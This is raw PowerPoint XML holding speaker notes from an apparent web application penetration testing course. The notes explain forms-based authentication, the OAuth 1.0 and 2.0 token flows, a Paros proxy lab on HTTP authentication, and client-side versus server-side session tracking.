                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Resource – Authentication serves no purpose if there isn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t a resource that requires it before allowing access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms-based authentication follows the process listed below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A client requests a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server responds with a page that includes a form (HTML, Flash,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> Java applet or other form type)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The user fills out the form.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The browser submits the page to the application, including the information from the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This response is processed by the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Either an error page or the resource requested is returned to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038"/>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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244740"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As is shown in this diagram, the user is presented with a HTML form.  They fill in the items requested, typically username and password.  This form is then submitted to the processing code, which can be a part of the same or separate page.  The processing code then connects to the back end data source and validates the authentication information.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>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Attackers are excited to discover sites which rely upon forms-based authentication, because the developer is responsible for implementing security. As a result, the security of sites which rely upon forms-based authentication is inconsistent, and often vulnerabilities can be found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most injection attacks can be used against vulnerable forms-based authentication, and if the authentication token can be captured, the attacker has access to the site.</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OAuth was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> built to solve the problem of third party applications connecting to service providers on our behalf, but without giving them our credentials to the service provider.  OAuth is heavily used in mobile applications and desktop applications, but it is also used from one web application to another.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2886641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Bob wants to use the fictional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Twitter application to post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to his Twitter feed.  He uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> application and tells it he wants it to interact on his behalf with Twitter.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> asks Twitter for a request token.  Twitter sends back a request token and a secret for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to use. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> uses this secret to sign each request it sends to Twitter so that Twitter can verify that the request is valid and not forged by someone else.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34479158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pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends the request token to Bob and tells him to take it to Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and approve access for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> then redirects Bob to Twitter to approve the access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bob tells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Twitter that he wants to approve access for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>.  Twitter confirms that Bob really wants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to be able to perform a number of actions on his behalf.  When Bob confirms the authorization to access his account, Twitter tells Bob that he needs to inform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> that they can now use the request token.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018859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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Unfortunately, the rush to add features and improve web application capability has led organizations to focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>business functionality testing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> security testing.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Even when security is tested, it’s often an afterthought.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" i="1" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If you look at the Open Source Vulnerability Database (http://www.osvdb.org) you will see that the highest number of reported vulnerabilities are web application related.  New web application vulnerabilities are being found and discussed every day on mailing lists such as Full Disclosure and Bugtraq.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You can also check out XSSed.com to find announcements are public web sites being found vulnerable to various web flaws.  It is pretty surprising  how often web sites find out they are vulnerable due to announcements like the ones on this site and others.</a:t>
            </a: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Bob tells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that the request token is ready to go.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> then asks Twitter to exchange the request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> token for an access token.  Twitter checks to make sure that the request token has been authorized by Bob.  If so, Twitter sends back an access token and secret to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to use when posting to Bob’s Twitter feed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>pro.evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> then sends a request to Twitter to be posted on Bob’s feed, sending along the access token and signing it with the secret.  Twitter verifies that the signature on the access token is valid and posts the requested data to Bob’s feed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307010576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OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> 1.0 depends on the integrity of the secret key to ensure that messages are not spoofed.  There is no requirement for transport encryption and tokens do not expire.  So the protecting the secret key is the major priority.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21738613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OAuth 2.0 adds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> token expiration and SSL communication requirements to protect tokens.  Even if a token is intercepted, it will have a limited lifespan before it is automatically replaced.  However, the renewal process must be implemented properly or the security of this version falls apart.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38494661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amount of information that needs to be checked in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> an OAuth 1.0 request.  Signatures need to be calculated and verified on the server to make sure that a request is not forged.  An OAuth 2.0 is much simpler to parse, but needs to handle securely regenerating access tokens when they expire.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26272491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with forms based authentication, the developers are responsible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> for properly implementing the security with an OAuth deployment.  Misconfiguration, poor implementation and information leakage may all yield valuable information in testing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7872448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altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Scenario:  In this exercise, you will become acquainted with the various types of authentication that can be used over HTTP.  As a web application penetration tester, it is important that you have a solid understanding of how these authentication schemes work, as well as an appreciation of their strengths and weaknesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="SimSun" charset="0"/>
              <a:cs typeface="SimSun" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Objectives: You will examine the data being transmitted to and from the server during a Basic Authentication session, a Digest Authentication session, and a Form authentication session using a man-in-the-middle proxy tool, Paros.  Paros has many uses in web application testing and it is important that you become familiar with its user interface and the information that it provides.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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65</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xfrm>
            <a:off x="685800" y="4579938"/>
            <a:ext cx="5943600" cy="4354512"/>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This next section will cover session state and how a web application tracks requests.</a:t>
            </a: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66</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HTTP is a stateless protocol. This means that the application must maintain a method of identifying requests as being part of the same session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Servers must have a way to identify individual requests as being part of a longer session.  Otherwise, many applications would not be able to keep track of the data used to provide functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most web languages have built in session management and these are the recommended way to maintain session state.  They have been tested and when errors are found, mostly, they are fixed.  When developers get fancy and create their own session management system, they often miss something.  In these cases, the attacker has an opportunity to break the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Popular methods include cookies, URL parameters and hidden form fields.</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67</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To track sessions, a token, numeric identifier or other unique information is passed between the client and the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usually, applications use a single identifier as the token, session id or numeric data in order to track sessions.  That said, the developer of the application is free to use whatever they like.  For example, some developers pass every piece of information they need to the client and back again.  Of course, they trust that the client will not change this data before sending it back to the server. (Insert evil laugh here.)</a:t>
            </a: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68</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All of these mechanisms for passing session state are used to support one of two types of sessions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	Client-Side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	Server-Side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In client-side sessions, the application sends all the session data to the client and the client sends it back unchanged.  This lowers the overhead on the server and enables the application to be load-balanced across multiple servers, without having to be specially configured to support persistent sessions across the various servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side sessions bode well for attackers, since the server trusts the client completely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In server-side sessions, all of the session data is stored on the server.  A session ID is passed between the client and the server.  Sometimes, the server will still pass the session data to the client for GUI support or user friendliness, but in secure applications this data is untrusted when it is returned and verified against the server version.  </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69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Asynchronous JavaScript and XML (AJAX) is a popular way to make web pages more interactive.  Typical web sites require the user to click a link or image, the request goes to the server and then the entire web pages redraws with the result.  With AJAX, as the user interacts with the site, JavaScript code is executed to make calls and retrieve data from the server.  The page is then dynamically updated as data is received.  Google Maps is an excellent example of this technology.  Metasploit (a very handy framework for exploitation) also includes AJAX in its web interface, so even the attack tools are using it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session data is important, but how do we track this session across requests? The platform usually provides us a means but the application may over ride it or use its own method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
